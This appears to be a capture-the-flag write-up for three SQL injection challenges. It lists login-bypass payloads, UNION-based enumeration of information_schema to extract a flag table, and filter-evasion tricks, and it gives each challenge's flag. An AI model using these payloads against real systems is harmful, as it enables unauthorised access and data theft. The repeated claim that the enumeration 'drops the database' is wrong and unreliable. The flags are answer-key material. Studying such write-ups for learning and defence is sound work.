SQLI

---

Chal 1

Given a basic login form with username and password required. Since those credentials were not provided, it's time for SQLI. There are many ways to bypass this login form

' OR 1 --
test ' --
anything ' #

---

Flag

4turkr34tif24{F1R5T_5T3P_PR0_SQLi}

---

Chal 2

Given was a flight tracking website. User need to enter their tracking number in the form.

To validate whether the database using sql or not, put any sql syntax in that form and it will displayed an error or warning.

This challenge is different than the one before. The idea here is to drop the database instead of bypassing the credential checking.

-1 union select null, null, null, null, null, null, null --

Search for table count using the 'null's. If it hits, it will drop the database

Now, the database is present. Look for the suitable table and column.

-1 'union select null, null, table_name, null, null, null, null from information_schema.tables --

this table is the interesting one

To look for the column, use this.

-1 'union select null, null, column_name, null, null, null, null from information_schema.columns where table_name = 'fl4g' --

this column is the interesting one

Now that the right column and table are identified, just craft the right syntax

-1 'union select null, null, f0undM3, null, null, null, null from fl4g --

---

Flag

4turkr34tif24{h4v354f370urn3y}

---

Chal 3

For Level 1, there's many payload to bypass this since it filters OR

admin' #
admin' --
'='

Level 2 filters OR, AND, LIKE, --, =

Use the payload to bypass it.

admin' #

Level 3 filters OR, AND, LIKE, --, =, <, >

Again, just need to comment out the rest of the code.

admin #

Level 4 filters OR, AND, LIKE, --, =, <, >, UNION, ADMIN

The only way to input 'admin' without input 'admin' is to seperate the word.

ad'|'min' #

---

Flag

Flag: 4turkr34tif24{H4141_1NJ3c710N_!??}